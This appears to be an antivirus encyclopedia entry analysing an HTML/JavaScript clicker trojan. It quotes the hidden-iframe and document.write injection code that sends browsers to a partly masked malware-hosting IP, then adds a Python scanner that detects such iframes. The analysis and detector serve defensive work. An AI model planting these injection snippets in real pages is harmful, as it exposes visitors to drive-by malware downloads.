Trojan.Clicker.HTML.IFrame.AR (Trojan.Clicker.HTML.IFrame, Trojan.Downloader.JS)
SYMPTOMS: This detection may be triggered when accessing suspicious web pages.

TECHNICAL DESCRIPTION: This is malicious JavaScript that a user may download unknowingly when visiting various infected websites. It contains code for displaying a hidden iframe:

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe>

and an encrypted code which points to:

<SCRIPT>window.status='Done';document.write('<iframe name=[random_nr] src=\'http://77.221.133.X/.if/go.html?'+Math.round(Math.random()*[random_nr])+'[random_nr]\'width=303 height=93 style=\'display: none\'></iframe>')</SCRIPT>

and redirects the browser to a malicious website: "http://77.221.133.X/.if/go.html?[random_nr]", an IP address hosted in Russia ([removed]atapoint.ru). On reaching this site, the user may be infected with other malware and redirected to pages like:

http://77.221.133.X/.dif/go.php?sid=1
http://77.221.133.X/.sp/in.cgi?p=o

which also contain hidden iframes:

<iframe src="http://77.221.133.X/.dif/go.php?sid=1" style="border:0px solid gray;" WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>

Removal instructions: Please let BitDefender disinfect your files.

ANALYZED BY: Dan Anton, virus researcher
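A defender-side check for the three iframe patterns quoted in the technical description: the 1x1 frame with visibility hidden, the display-none frame written by document.write, and the 0x0 frame. This is an added example, not BitDefender's detection code; the names scan and HiddenIframeFinder, the reason labels and the host.invalid sample are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Inline styles that hide an element, matching the samples in the description.
HIDING_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
# A script that writes an iframe into the page with document.write().
DOCWRITE_IFRAME = re.compile(r"document\.write\s*\(\s*['\"]\s*<iframe", re.I)

def _tiny(value):
    """True when a width/height attribute is 0 or 1 (pixels)."""
    m = re.match(r"\s*(\d+)", value or "")
    return bool(m) and int(m.group(1)) <= 1

class HiddenIframeFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []      # list of (src, [reasons])
        self._script = None     # buffered script text while inside <script>

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._script = []
        elif tag == "iframe":
            a = dict(attrs)     # HTMLParser lower-cases attribute names
            reasons = []
            if HIDING_STYLE.search(a.get("style") or ""):
                reasons.append("hiding-style")
            if _tiny(a.get("width")) and _tiny(a.get("height")):
                reasons.append("tiny-size")
            if reasons:
                self.findings.append((a.get("src"), reasons))

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)   # script bodies may arrive in chunks

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            if DOCWRITE_IFRAME.search("".join(self._script)):
                self.findings.append((None, ["script-written-iframe"]))
            self._script = None

def scan(html):
    """Return findings for hidden or script-injected iframes in an HTML string."""
    finder = HiddenIframeFinder()
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample (placeholder host), modelled on the first snippet above.
SAMPLE = "<p>hi</p><iframe src='http://host.invalid/' width='1' height='1' style='visibility: hidden;'></iframe>"
print(scan(SAMPLE))
```

A visible iframe of normal size produces no finding, so the check can run over cached pages or proxy captures without flagging ordinary embeds.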